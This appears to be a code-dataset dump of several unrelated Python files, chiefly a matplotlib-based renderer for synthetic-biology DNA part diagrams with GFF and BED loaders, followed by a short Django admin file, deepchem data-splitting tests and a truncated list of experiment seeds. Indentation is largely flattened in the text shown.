y_extent = 1.5
arrowhead_height = 1.0
arrowhead_length = 30.0
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'hatch' in list(opts.keys()):
hatch = opts['hatch']
if 'y_offset' in list(opts.keys()):
y_offset = opts['y_offset']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'arrowhead_height' in list(opts.keys()):
arrowhead_height = opts['arrowhead_height']
if 'arrowhead_length' in list(opts.keys()):
arrowhead_length = opts['arrowhead_length']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
    # Check direction
dir_fac = 1.0
if start_bp > end_bp:
dir_fac = -1.0
# Draw the CDS symbol
p1 = Polygon([(start_bp, y_extent+y_offset),
(start_bp, -y_extent+y_offset),
(end_bp-dir_fac*arrowhead_length*scale, -y_extent+y_offset),
(end_bp-dir_fac*arrowhead_length*scale, -y_extent-arrowhead_height+y_offset),
(end_bp, 0+y_offset),
(end_bp-dir_fac*arrowhead_length*scale, y_extent+arrowhead_height+y_offset),
(end_bp-dir_fac*arrowhead_length*scale, y_extent+y_offset)],
edgecolor=(0.0,0.0,0.0), facecolor=color, linewidth=linewidth,
hatch=hatch, zorder=15+zorder_add,
        path_effects=[Stroke(joinstyle="miter")]) # This is a workaround for matplotlib < 1.4.0
ax.add_patch(p1)
if opts != None and 'label' in list(opts.keys()):
if start_bp > end_bp:
write_label(ax, opts['label'], end_bp+((start_bp-end_bp)/2.0), opts=opts)
else:
write_label(ax, opts['label'], start_bp+((end_bp-start_bp)/2.0), opts=opts)
if start_bp > end_bp:
return end_bp, start_bp
else:
return start_bp, end_bp
def trace_terminator (ax, type, num, start_bp, end_bp, prev_end, scale, linewidth, opts):
""" Built-in trace-based terminator renderer.
"""
# Default options
zorder_add = 0.0
color = (1.0,0.0,0.0)
y_offset = 0.0
y_extent = 3.5
x_extent = 10.0
highlight_y_extent = 0.8
# Reset defaults if provided
if opts != None:
if 'zorder_add' in list(opts.keys()):
zorder_add = opts['zorder_add']
if 'color' in list(opts.keys()):
color = opts['color']
if 'y_offset' in list(opts.keys()):
y_offset = opts['y_offset']
if 'y_extent' in list(opts.keys()):
y_extent = opts['y_extent']
if 'x_extent' in list(opts.keys()):
x_extent = opts['x_extent']
if 'highlight_y_extent' in list(opts.keys()):
highlight_y_extent = opts['highlight_y_extent']
if 'linewidth' in list(opts.keys()):
linewidth = opts['linewidth']
if 'scale' in list(opts.keys()):
scale = opts['scale']
    # Check direction
dir_fac = 1.0
if start_bp > end_bp:
dir_fac = -1.0
# Draw the terminator symbol
l1 = Line2D([start_bp,start_bp],[0+y_offset,dir_fac*y_extent+y_offset], linewidth=linewidth, color=color, zorder=8+zorder_add)
l2 = Line2D([start_bp-(x_extent*scale),start_bp+(x_extent*scale)],[dir_fac*y_extent+y_offset,dir_fac*y_extent+y_offset], linewidth=linewidth, color=color, zorder=14+zorder_add)
ax.add_line(l1)
ax.add_line(l2)
# Shade the terminator area (normally smaller than symbol extent)
p2 = Polygon([(start_bp, -highlight_y_extent+y_offset),
(start_bp, highlight_y_extent+y_offset),
(end_bp, highlight_y_extent+y_offset),
(end_bp, -highlight_y_extent+y_offset)], facecolor=color, edgecolor=color, linewidth=linewidth, zorder=13,
        path_effects=[Stroke(joinstyle="miter")]) # This is a workaround for matplotlib < 1.4.0
ax.add_patch(p2)
if opts != None and 'label' in list(opts.keys()):
if start_bp > end_bp:
write_label(ax, opts['label'], end_bp+((start_bp-end_bp)/2.0), opts=opts)
else:
write_label(ax, opts['label'], start_bp+((end_bp-start_bp)/2.0), opts=opts)
if start_bp > end_bp:
return end_bp, start_bp
else:
return start_bp, end_bp
###############################################################################
# The DNA renderer
###############################################################################
class DNARenderer:
""" Class defining the DNA rendering funtionality.
"""
# Standard part types
STD_PART_TYPES = ['Promoter',
'CDS',
'Terminator',
'RBS',
'Scar',
'Spacer',
'EmptySpace',
'Ribozyme',
'Ribonuclease',
'Protease',
'DNACleavageSite',
'RNACleavageSite',
'ProteinCleavageSite',
'DNALocation',
'RNALocation',
'ProteinLocation',
'DNAStability',
'RNAStability',
'ProteinStability',
'StemTop',
'Operator',
'Origin',
'Insulator',
'5Overhang',
'3Overhang',
'RestrictionSite',
'BluntRestrictionSite',
'PrimerBindingSite',
'5StickyRestrictionSite',
'3StickyRestrictionSite',
'UserDefined',
'Signature']
# Standard regulatory types
STD_REG_TYPES = ['Repression',
'Activation',
'Connection']
def __init__(self, scale=1.0, linewidth=1.0, linecolor=(0,0,0),
backbone_pad_left=0.0, backbone_pad_right=0.0):
""" Constructor to generate an empty DNARenderer.
Parameters
----------
scale : float (default=1.0)
A scaling factor for the plot. Only used if rendering traces.
        linewidth : float (default=1.0)
            The default linewidth for all part drawing.
        linecolor : tuple (default=(0,0,0))
            The default color of the backbone line.
        backbone_pad_left : float (default=0.0)
            Padding to add to the left side of the backbone.
        backbone_pad_right : float (default=0.0)
            Padding to add to the right side of the backbone.
"""
self.scale = scale
self.linewidth = linewidth
self.linecolor = linecolor
self.backbone_pad_left = backbone_pad_left
self.backbone_pad_right = backbone_pad_right
self.reg_height = 15
def SBOL_part_renderers (self):
""" Return dictionary of all standard built-in SBOL part renderers.
"""
return {
'Promoter' :sbol_promoter,
'CDS' :sbol_cds,
'Terminator' :sbol_terminator,
'RBS' :sbol_rbs,
'Scar' :sbol_scar,
'Spacer' :sbol_spacer,
'EmptySpace' :sbol_empty_space,
'Ribozyme' :sbol_ribozyme,
'Ribonuclease' :sbol_stem_top,
'Protease' :sbol_stem_top,
'DNACleavageSite' :sbol_stem_top,
'RNACleavageSite' :sbol_stem_top,
'ProteinCleavageSite':sbol_stem_top,
'DNALocation' :sbol_stem_top,
'RNALocation' :sbol_stem_top,
'ProteinLocation' :sbol_stem_top,
'DNAStability' :sbol_stem_top,
'RNAStability' :sbol_stem_top,
'ProteinStability' :sbol_stem_top,
'StemTop' :sbol_stem_top,
'Operator' :sbol_operator,
'Origin' :sbol_origin,
'Insulator' :sbol_insulator,
'5Overhang' :sbol_5_overhang,
'3Overhang' :sbol_3_overhang,
'RestrictionSite' :sbol_restriction_site,
'BluntRestrictionSite' :sbol_blunt_restriction_site,
'PrimerBindingSite' :sbol_primer_binding_site,
'5StickyRestrictionSite' :sbol_5_sticky_restriction_site,
'3StickyRestrictionSite' :sbol_3_sticky_restriction_site,
'UserDefined' :sbol_user_defined,
'Signature' :sbol_signature}
def trace_part_renderers (self):
""" Return dictionary of all standard built-in trace part renderers.
"""
return {
'Promoter' :trace_promoter,
'CDS' :trace_cds,
'Terminator' :trace_terminator,
'RBS' :trace_rbs,
'UserDefined' :trace_user_defined}
def std_reg_renderers (self):
""" Return dictionary of all standard built-in regulation renderers.
"""
return {
'Repression' :repress,
'Activation' :induce,
'Connection' :connect}
def renderDNA (self, ax, parts, part_renderers, regs=None, reg_renderers=None, plot_backbone=True):
""" Render the parts on the DNA and regulation.
Parameters
----------
ax : matplotlib.axes
Axes to draw the design to.
parts : list(dict)
The design to draw. This is a list of dicts, where each dict relates to
a part and must contain the following keys:
- name (string)
- type (string)
- fwd (bool)
- start (float, optional)
- end (float, optional)
            These will then be drawn in accordance with the renderers selected.
        part_renderers : dict(functions)
            Dict of functions where the key is the part type and the value is the
            function used to draw that part type.
regs : list(dict) (default=None)
Regulation present in the design. This is a list of dicts, where each dict
relates to a single regulation arc and must contain the following keys:
- type (string)
- from_part (part object dict)
- to_part (part object dict)
            These will then be drawn in accordance with the renderers selected.
        reg_renderers : dict(functions) (default=None)
            Dict of functions where the key is the regulation type and the value is
            the function used to draw that regulation type.
        plot_backbone : bool (default=True)
            Whether to draw the DNA backbone line beneath the parts.
Returns
-------
start : float
The x-point in the axis space that drawing begins.
end : float
The x-point in the axis space that drawing ends.
"""
# Update the matplotlib rendering default for drawing the parts (we want mitered edges)
matplotlib.rcParams['lines.dash_joinstyle'] = 'miter'
matplotlib.rcParams['lines.dash_capstyle'] = 'butt'
matplotlib.rcParams['lines.solid_joinstyle'] = 'miter'
matplotlib.rcParams['lines.solid_capstyle'] = 'projecting'
# Make text editable in Adobe Illustrator
matplotlib.rcParams['pdf.fonttype'] = 42
# Plot the parts to the axis
part_num = 0
prev_end = 0
first_start = 0
first_part = True
for part in parts:
keys = list(part.keys())
# Check the part has minimal details required
if 'type' in keys:
if 'fwd' not in keys:
part['fwd'] = True
elif part['fwd'] == False and 'start' in keys and 'end' in keys:
start = part['start']
end = part['end']
part['end'] = start
part['start'] = end
if 'start' not in keys:
if part['fwd'] == True:
part['start'] = part_num
else:
part['start'] = part_num+1
if 'end' not in keys:
if part['fwd'] == True:
part['end'] = part_num+1
else:
part['end'] = part_num
# Extract custom part options (if available)
part_opts = None
if 'opts' in list(part.keys()):
part_opts = part['opts']
# Use the correct renderer
if 'renderer' in list(part.keys()):
# Use custom renderer
prev_start, prev_end = part['renderer'](ax, part['type'], part_num,
part['start'], part['end'], prev_end,
self.scale, self.linewidth,
opts=part_opts)
#update start,end for regulation
#part['start'] = prev_start
#part['end'] = prev_end
if first_part == True:
first_start = prev_start
first_part = False
else:
# Use standard renderer, if one exists
if part['type'] in list(part_renderers.keys()):
prev_start, prev_end = part_renderers[part['type']](ax,
part['type'], part_num,
part['start'], part['end'],
prev_end, self.scale,
self.linewidth, opts=part_opts)
#update start,end for regulation [TEG]
if part['fwd'] == True:
part['start'] = prev_start
part['end'] = prev_end
else:
part['start'] = prev_end
part['end'] = prev_start
if first_part == True:
first_start = prev_start
first_part = False
part_num += 1
# first pass to get all of the arcranges
if regs != None:
for reg in regs:
keys = list(reg.keys())
# Check the part has minimal details required
if 'type' in keys and 'from_part' in keys and 'to_part' in keys:
# Extract custom part options (if available)
reg_opts = None
if 'opts' in list(reg.keys()):
reg_opts = reg['opts']
if reg['type'] in list(reg_renderers.keys()):
##############################################################################
arcstart = (reg['from_part']['start'] + reg['from_part']['end']) / 2
arcend = (reg['to_part']['start'] + reg['to_part']['end']) / 2
arcrange = [arcstart,arcend]
reg['arclength'] = math.fabs(arcstart-arcend)
reg['arc_height_index'] = 1
##############################################################################
        # Sort regs by arc range from shortest to longest
regs.sort(key=lambda x: x['arclength'], reverse=False)
reg_num = 0
pos_arc_ranges = [] # arc above DNA backbone if to_part is fwd
neg_arc_ranges = [] # arc below DNA backbone if to_part is reverse
current_max = 1
# second pass to render all the arcs
for reg in regs:
keys = list(reg.keys())
# Check the part has minimal details required
if 'type' in keys and 'from_part' in keys and 'to_part' in keys:
# Extract custom part options (if available)
reg_opts = None
if 'opts' in list(reg.keys()):
reg_opts = reg['opts']
if reg['type'] in list(reg_renderers.keys()):
##############################################################################
# arc height algorithm: greedy from left-to-right on DNA design
arcstart = (reg['from_part']['start'] + reg['from_part']['end']) / 2
arcend = (reg['to_part']['start'] + reg['to_part']['end']) / 2
arcmin = min(arcstart,arcend)
arcmax = max(arcstart,arcend)
arcrange = [arcmin,arcmax,reg['arc_height_index']]
arc_height_index = 1
# arc above if to_part is fwd
if(reg['to_part']['fwd'] == True):
# find max arc height index of ONLY the prior arcs that clash with the current arc
current_max = 1
for r in pos_arc_ranges:
if (arcrange[0] > r[0] and arcrange[0] < r[1]):
if(r[2] > current_max):
current_max = r[2]
elif(arcrange[0] > r[1] and arcrange[0] < r[0]):
if(r[2] > current_max):
current_max = r[2]
elif(arcrange[1] > r[0] and arcrange[0] < r[1]):
if(r[2] > current_max):
current_max = r[2]
elif(arcrange[1] > r[1] and arcrange[0] < r[0]):
if(r[2] > current_max):
current_max = r[2]
# if arcs cross over, increment the arc height index
for r in pos_arc_ranges:
if (arcrange[0] > r[0] and arcrange[0] < r[1]):
reg['arc_height_index'] = current_max + 1
arcrange[2] = reg['arc_height_index']
elif(arcrange[0] > r[1] and arcrange[0] < r[0]):
reg['arc_height_index'] = current_max + 1
arcrange[2] = reg['arc_height_index']
elif(arcrange[1] > r[0] and arcrange[0] < r[1]):
reg['arc_height_index'] = current_max + 1
arcrange[2] = reg['arc_height_index']
elif(arcrange[1] > r[1] and arcrange[0] < r[0]):
reg['arc_height_index'] = current_max + 1
arcrange[2] = reg['arc_height_index']
pos_arc_ranges.append(arcrange)
# arc below if to_part is reverse
else:
# find max arc height index
current_max = 1
for r in neg_arc_ranges:
if (arcrange[0] > r[0] and arcrange[0] < r[1]):
if(r[2] > current_max):
current_max = r[2]
elif(arcrange[0] > r[1] and arcrange[0] < r[0]):
if(r[2] > current_max):
current_max = r[2]
elif(arcrange[1] > r[0] and arcrange[0] < r[1]):
if(r[2] > current_max):
current_max = r[2]
elif(arcrange[1] > r[1] and arcrange[0] < r[0]):
if(r[2] > current_max):
current_max = r[2]
# if arcs cross over, increment the arc height index
for r in neg_arc_ranges:
if (arcrange[0] > r[0] and arcrange[0] < r[1]):
reg['arc_height_index'] = current_max + 1
arcrange[2] = reg['arc_height_index']
elif(arcrange[0] > r[1] and arcrange[0] < r[0]):
reg['arc_height_index'] = current_max + 1
arcrange[2] = reg['arc_height_index']
elif(arcrange[1] > r[0] and arcrange[0] < r[1]):
reg['arc_height_index'] = current_max + 1
arcrange[2] = reg['arc_height_index']
elif(arcrange[1] > r[1] and arcrange[0] < r[0]):
reg['arc_height_index'] = current_max + 1
arcrange[2] = reg['arc_height_index']
neg_arc_ranges.append(arcrange)
##############################################################################
reg_renderers[reg['type']](ax, reg['type'],
reg_num, reg['from_part'],
reg['to_part'], self.scale,
self.linewidth, reg['arc_height_index'], opts=reg_opts)
reg_num += 1
# Plot the backbone (z=1)
if plot_backbone == True:
l1 = Line2D([first_start-self.backbone_pad_left,prev_end+self.backbone_pad_right],[0,0],
linewidth=self.linewidth, color=self.linecolor, zorder=10)
ax.add_line(l1)
return first_start, prev_end
def annotate (self, ax, part_renderers, part, annotate_zorder=1000):
""" Annotate a plot at a user specified location and offset.
"""
        # Annotations should be placed on top of the existing design
if 'opts' not in list(part.keys()):
part['opts'] = {'zorder_add': annotate_zorder}
else:
part['opts']['zorder_add'] = annotate_zorder
# Draw the part
part_renderers[part['type']](ax,
part['type'], 1,
part['start'], part['end'],
part['start'], self.scale,
self.linewidth, opts=part['opts'])
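# Minimal usage sketch for DNARenderer.renderDNA(). It assumes matplotlib.pyplot
# is available as plt (plt is used by save_sbol_designs below); the part names
# and the single repression arc are illustrative only.
def _render_dna_example():
    design = [{'type': 'Promoter',   'name': 'P1', 'fwd': True},
              {'type': 'RBS',        'name': 'R1', 'fwd': True},
              {'type': 'CDS',        'name': 'G1', 'fwd': True},
              {'type': 'Terminator', 'name': 'T1', 'fwd': True}]
    # Regulation arcs reference the part dicts themselves; renderDNA fills in
    # their 'start'/'end' coordinates during the part-drawing pass.
    regs = [{'type': 'Repression', 'from_part': design[2], 'to_part': design[0]}]
    dr = DNARenderer()
    fig = plt.figure(figsize=(4.0, 1.5))
    ax = fig.add_subplot(1, 1, 1)
    start, end = dr.renderDNA(ax, design, dr.SBOL_part_renderers(),
                              regs=regs, reg_renderers=dr.std_reg_renderers())
    ax.set_xlim([start - 1.0, end + 1.0])
    ax.set_ylim([-35, 35])
    ax.set_axis_off()
    return fig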
###############################################################################
# Helper functions to simplify plotting
###############################################################################
def plot_sbol_designs (axes, dna_designs, regulations=None, plot_params=None, plot_names=None):
""" Plot SBOL designs to axes.
Parameters
----------
axes : list(matplotlib.axis)
List of axis objects to plot the designs to.
dna_designs : list(dict(design_information))
List of designs to plot.
regulations : list(dict(regulation_information)) (default=None)
List of regulations to use for each design.
    plot_params : dict (default=None)
General plotting parameters to use.
plot_names : list(string) (default=None)
        List of names to use on each plot. If None is provided then no titles are displayed.
    Returns
    -------
    max_dna_len : float
        Length of the longest design drawn.
    xlims : [float, float]
        The x-axis range for each axis.
    ylims : [float, float]
        The y-axis range for each axis.
"""
    # Standard plotting parameters (plot_params defaults to an empty dict;
    # using None in the signature avoids the shared mutable default pitfall)
    if plot_params == None:
        plot_params = {}
    if 'axis_y' not in list(plot_params.keys()):
        plot_params['axis_y'] = 35
left_pad = 0.0
right_pad = 0.0
scale = 1.0
linewidth = 1.0
fig_y = 5.0
fig_x = 5.0
if 'backbone_pad_left' in list(plot_params.keys()):
left_pad = plot_params['backbone_pad_left']
if 'backbone_pad_right' in list(plot_params.keys()):
right_pad = plot_params['backbone_pad_right']
if 'scale' in list(plot_params.keys()):
scale = plot_params['scale']
if 'linewidth' in list(plot_params.keys()):
linewidth = plot_params['linewidth']
dr = DNARenderer(scale=scale, linewidth=linewidth,
backbone_pad_left=left_pad,
backbone_pad_right=right_pad)
# We default to the standard regulation renderers
reg_renderers = dr.std_reg_renderers()
# We default to the SBOL part renderers
part_renderers = dr.SBOL_part_renderers()
# Plot each design on the appropriate axis
num_of_designs = len(dna_designs)
max_dna_len = 0.0
for i in range(num_of_designs):
# Create axis for the design and plot
regs = None
if(regulations != None):
regs = regulations[i]
design = dna_designs[i]
ax = axes[i]
if plot_names != None:
ax.set_title(plot_names[i], fontsize=8)
start, end = dr.renderDNA(ax, design, part_renderers, regs, reg_renderers)
dna_len = end-start
if max_dna_len < dna_len:
max_dna_len = dna_len
# Update formatting and resize all axis in similar way
for ax in axes:
ax.set_xticks([])
ax.set_yticks([])
# Set bounds
ax.set_xlim([(-0.01*max_dna_len)-left_pad,
max_dna_len+(0.01*max_dna_len)+right_pad])
ax.set_ylim([-plot_params['axis_y'],plot_params['axis_y']])
ax.set_aspect('equal')
ax.set_axis_off()
    # max_dna_len, xlims, ylims are returned
return max_dna_len, [(-0.01*max_dna_len)-left_pad, max_dna_len+(0.01*max_dna_len)+right_pad], [-plot_params['axis_y'],plot_params['axis_y']]
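# Usage sketch for plot_sbol_designs(): one matplotlib axis per design. The
# two designs below are illustrative; any type listed in
# DNARenderer.STD_PART_TYPES may be used.
def _plot_sbol_designs_example():
    designs = [[{'type': 'Promoter', 'name': 'P1', 'fwd': True},
                {'type': 'CDS', 'name': 'G1', 'fwd': True}],
               [{'type': 'Promoter', 'name': 'P2', 'fwd': True},
                {'type': 'CDS', 'name': 'G2', 'fwd': False}]]
    fig = plt.figure(figsize=(4.0, 2.0))
    axes = [fig.add_subplot(2, 1, i + 1) for i in range(2)]
    max_dna_len, xlims, ylims = plot_sbol_designs(axes, designs,
                                                  plot_names=['design A', 'design B'])
    return fig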
def save_sbol_designs (filename, dna_designs, regulations=None, plot_params=None, plot_names=None):
    """ Plot SBOL designs and save them to an image file.
Parameters
----------
filename : string
        Image filename to save designs to. The extension provided will determine the format
and must be supported by matplotlib.
dna_designs : list(dict(design_information))
List of designs to plot.
regulations : list(dict(regulation_information)) (default=None)
List of regulations to use for each design.
    plot_params : dict (default=None)
General plotting parameters to use.
plot_names : list(string) (default=None)
        List of names to use on each plot. If None is provided then no titles are displayed.
"""
# Create the figure
fig = plt.figure(figsize=(10,10))
fig.patch.set_facecolor('white')
# Create all the axes required
axes = []
for i in range(len(dna_designs)):
        ax = fig.add_subplot(len(dna_designs),1,i+1, facecolor='white') # 'axisbg' was removed in matplotlib 2.0
axes.append(ax)
# Plot design to the axes
    max_dna_len, xlims, ylims = plot_sbol_designs(axes, dna_designs, regulations=regulations, plot_params=plot_params, plot_names=plot_names)
# Update the size of the figure to fit the constructs drawn
fig_x_dim = max_dna_len/70.0
if fig_x_dim < 1.0:
fig_x_dim = 1.0
fig_y_dim = 1.2*len(axes)
plt.gcf().set_size_inches( (fig_x_dim, fig_y_dim) )
# Save the figure
plt.tight_layout()
fig.savefig(filename, transparent=True, dpi=300)
# Clear the plotting cache
plt.close('all')
###############################################################################
# Functions for reading designs from standard file formats
###############################################################################
def convert_attrib (attrib):
if attrib[0] == '(' and attrib[-1] == ')' and len(attrib.split(',')) == 3:
col_parts = attrib[1:-1].split(',')
new_col = (float(col_parts[0]), float(col_parts[1]), float(col_parts[2]))
return new_col
if attrib[0] == '(' and attrib[-1] == ')' and len(attrib.split(',')) == 4:
col_parts = attrib[1:-1].split(',')
new_col = (float(col_parts[0]), float(col_parts[1]), float(col_parts[2]), float(col_parts[3]))
return new_col
try:
# See if a number
return float(attrib)
except ValueError:
# Must be a string
return attrib
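# Examples of the conversion rules above (illustrative inputs):
#   convert_attrib('(0.5,0.5,0.5)')     -> (0.5, 0.5, 0.5)        RGB tuple
#   convert_attrib('(0.5,0.5,0.5,1.0)') -> (0.5, 0.5, 0.5, 1.0)   RGBA tuple
#   convert_attrib('2.5')               -> 2.5                    number
#   convert_attrib('miter')             -> 'miter'                plain string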
dpl_default_type_map = {'gene': 'CDS',
'promoter': 'Promoter',
'terminator': 'Terminator',
'rbs': 'RBS'}
def load_design_from_gff (filename, chrom, type_map=dpl_default_type_map, region=None):
# Load the GFF data
gff = []
    data_reader = csv.reader(open(filename, 'r', newline=''), delimiter='\t') # 'rU' mode was removed in Python 3.11
for row in data_reader:
if len(row) == 9:
cur_chrom = row[0]
part_type = row[2]
start_bp = int(row[3])
end_bp = int(row[4])
part_dir = row[6]
part_attribs = {}
split_attribs = row[8].split(';')
part_name = None
for attrib in split_attribs:
key_value = attrib.split('=')
if len(key_value) == 2:
if key_value[0] == 'Name':
part_name = key_value[1]
else:
part_attribs[key_value[0]] = convert_attrib(key_value[1])
if part_name != None and cur_chrom == chrom and part_type in list(type_map.keys()):
            # Check feature start falls in region (no region means keep everything)
            if region == None or (start_bp > region[0] and start_bp < region[1]):
                gff.append([part_name, type_map[part_type], part_dir, start_bp, end_bp, part_attribs])
# Convert to DNAplotlib design (sort on start position first)
design = []
for gff_el in sorted(gff, key=itemgetter(3)):
new_part = {}
new_part['name'] = gff_el[0]
new_part['type'] = gff_el[1]
if gff_el[2] == '+':
new_part['fwd'] = True
else:
new_part['fwd'] = False
new_part['start'] = gff_el[3]
new_part['end'] = gff_el[4]
new_part['opts'] = gff_el[5]
design.append(new_part)
# Return the sorted design
return design
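# Sketch of the GFF input expected by load_design_from_gff(). A tab-separated
# row such as (columns: chrom, source, type, start, end, score, strand, frame,
# attributes; the names and values here are illustrative):
#   chr1  .  promoter  100  135  .  +  .  Name=P1;color=(0.0,0.0,1.0)
# with chrom='chr1' and region=(0, 1000) would yield the part dict:
#   {'name': 'P1', 'type': 'Promoter', 'fwd': True, 'start': 100, 'end': 135,
#    'opts': {'color': (0.0, 0.0, 1.0)}}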
def load_profile_from_bed (filename, chrom, region):
region_len = region[1]-region[0]
profile = [0]*region_len
    data_reader = csv.reader(open(filename, 'r', newline=''), delimiter='\t') # 'rU' mode was removed in Python 3.11
for row in data_reader:
if len(row) == 5:
cur_chrom = row[0]
cur_start_bp = int(row[1])
cur_end_bp = int(row[2])
            if cur_chrom == chrom and cur_start_bp == region[0] and cur_end_bp == region[1]: # Filter rows to the requested chromosome
profile[int(row[3])-1] = float(row[4])
return profile
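# Sketch of the BED input expected by load_profile_from_bed(): one row per
# position covered, where column 4 is the 1-based offset into the region and
# column 5 is the profile value. For example, with region=(0, 1000) the row
#   chr1  0  1000  1  12.5
# would set profile[0] = 12.5.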
---- dataset row: Code/RunFragility.py | repo: ChimieleCode/OpenSees_Script | license: MIT ----
from ModelOptions import compute_local_fragility
import Fragility.GlobalRegression
if compute_local_fragility:
import Fragility.LocalCurve
---- dataset row: pengujian/admin.py | repo: userbaruu/aerotron | license: MIT | stars: 1 (2021-07-28) ----
from django.contrib import admin
from pengujian.models.paket import PaketPengujian
from pengujian.models.pengujian import Pengujian
admin.site.register(Pengujian)
admin.site.register(PaketPengujian)
---- dataset row: app/user/tests/__init__.py | repo: karserasl/recipe-app-api | license: MIT ----
# @Author: Lam
# @Date: 29/05/2020 20:57
---- dataset row: deepchem/data/tests/test_data_loader.py | repo: hssinejihene/deepchem | license: MIT ----
"""
Tests for FeaturizedSamples class
"""
import os
import unittest
import tempfile
import shutil
import deepchem as dc
def test_unlabelled():
current_dir = os.path.dirname(os.path.abspath(__file__))
input_file = os.path.join(current_dir, "../../data/tests/no_labels.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
loader = dc.data.CSVLoader(
tasks=[], feature_field="smiles", featurizer=featurizer)
dataset = loader.create_dataset(input_file)
assert len(dataset.X)
def test_scaffold_test_train_valid_test_split():
"""Test of singletask RF ECFP regression API."""
current_dir = os.path.dirname(os.path.abspath(__file__))
splittype = "scaffold"
input_transforms = []
output_transforms = ["normalize"]
model_params = {}
tasks = ["log-solubility"]
task_type = "regression"
task_types = {task: task_type for task in tasks}
input_file = os.path.join(current_dir, "../../models/tests/example.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
input_file = os.path.join(current_dir, input_file)
loader = dc.data.CSVLoader(
tasks=tasks, feature_field="smiles", featurizer=featurizer)
dataset = loader.create_dataset(input_file)
# Splits featurized samples into train/test
splitter = dc.splits.ScaffoldSplitter()
train_dataset, valid_dataset, test_dataset = splitter.train_valid_test_split(
dataset)
assert len(train_dataset) == 8
assert len(valid_dataset) == 1
assert len(test_dataset) == 1
def test_scaffold_test_train_test_split():
"""Test of singletask RF ECFP regression API."""
current_dir = os.path.dirname(os.path.abspath(__file__))
splittype = "scaffold"
input_transforms = []
output_transforms = ["normalize"]
model_params = {}
tasks = ["log-solubility"]
task_type = "regression"
task_types = {task: task_type for task in tasks}
input_file = os.path.join(current_dir, "../../models/tests/example.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
input_file = os.path.join(current_dir, input_file)
loader = dc.data.CSVLoader(
tasks=tasks, feature_field="smiles", featurizer=featurizer)
dataset = loader.create_dataset(input_file)
# Splits featurized samples into train/test
splitter = dc.splits.ScaffoldSplitter()
train_dataset, test_dataset = splitter.train_test_split(dataset)
assert len(train_dataset) == 8
assert len(test_dataset) == 2
def test_random_test_train_valid_test_split():
"""Test of singletask RF ECFP regression API."""
current_dir = os.path.dirname(os.path.abspath(__file__))
input_transforms = []
output_transforms = ["normalize"]
model_params = {}
tasks = ["log-solubility"]
task_type = "regression"
task_types = {task: task_type for task in tasks}
input_file = os.path.join(current_dir, "../../models/tests/example.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
input_file = os.path.join(current_dir, input_file)
loader = dc.data.CSVLoader(
tasks=tasks, feature_field="smiles", featurizer=featurizer)
dataset = loader.create_dataset(input_file)
# Splits featurized samples into train/test
splitter = dc.splits.RandomSplitter()
train_dataset, valid_dataset, test_dataset = splitter.train_valid_test_split(
dataset)
assert len(train_dataset) == 8
assert len(valid_dataset) == 1
assert len(test_dataset) == 1
def test_random_test_train_test_split():
"""Test of singletask RF ECFP regression API."""
current_dir = os.path.dirname(os.path.abspath(__file__))
#splittype = "random"
model_params = {}
tasks = ["log-solubility"]
task_type = "regression"
task_types = {task: task_type for task in tasks}
input_file = os.path.join(current_dir, "../../models/tests/example.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
loader = dc.data.CSVLoader(
tasks=tasks, feature_field="smiles", featurizer=featurizer)
dataset = loader.create_dataset(input_file)
# Splits featurized samples into train/test
splitter = dc.splits.RandomSplitter()
train_dataset, test_dataset = splitter.train_test_split(dataset)
assert len(train_dataset) == 8
assert len(test_dataset) == 2
def test_log_solubility_dataset():
"""Test of loading for simple log-solubility dataset."""
current_dir = os.path.dirname(os.path.realpath(__file__))
input_file = "../../models/tests/example.csv"
input_file = os.path.join(current_dir, input_file)
tasks = ["log-solubility"]
loader = dc.data.CSVLoader(
tasks=tasks,
feature_field="smiles",
featurizer=dc.feat.CircularFingerprint(size=1024))
dataset = loader.create_dataset(input_file)
assert len(dataset) == 10
def test_dataset_move():
"""Test that dataset can be moved and reloaded."""
current_dir = os.path.dirname(os.path.abspath(__file__))
base_dir = tempfile.mkdtemp()
data_dir = os.path.join(base_dir, "data")
moved_data_dir = os.path.join(base_dir, "moved_data")
dataset_file = os.path.join(current_dir, "../../models/tests/example.csv")
featurizer = dc.feat.CircularFingerprint(size=1024)
tasks = ["log-solubility"]
loader = dc.data.CSVLoader(
tasks=tasks, feature_field="smiles", featurizer=featurizer)
featurized_dataset = loader.create_dataset(dataset_file, data_dir)
n_dataset = len(featurized_dataset)
# Now perform move
shutil.move(data_dir, moved_data_dir)
moved_featurized_dataset = dc.data.DiskDataset(moved_data_dir)
assert len(moved_featurized_dataset) == n_dataset
---- dataset row: project/experiments/exp_800_mile_stone/src/old/tmp_np.py | repo: liusida/thesis-bodies | license: MIT ----
# import numpy as np
# a = np.array([17,22,4,2,14,24,0,5,8,7,27,28,15,25,12,9,20,3,29,16,10,6,1,13,18,23,11,26,21,19])
# np.random.shuffle(a)
# print(a.tolist())
# np.random.shuffle(a)
# print(a.tolist())
# np.random.shuffle(a)
# print(a.tolist())
need_rerun = [
{'bodies': [300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315],
'seed': 4, 'method': 'align'},
{'bodies': [300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315],
'seed': 6, 'method': 'random'},
{'bodies': [500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 511, 512, 513, 514, 515],
'seed': 0, 'method': 'align'},
{'bodies': [500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 511, 512, 513, 514, 515],
'seed': 4, 'method': 'align'},
{'bodies': [500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 511, 512, 513, 514, 515],
'seed': 6, 'method': 'align'},
{'bodies': [500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 511, 512, 513, 514, 515],
'seed': 0, 'method': 'random'},
{'bodies': [500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 511, 512, 513, 514, 515],
'seed': 3, 'method': 'random'},
{'bodies': [500, 501, 502, 503, 504, 505, 506, 507, 508, 509, 510, 511, 512, 513, 514, 515],
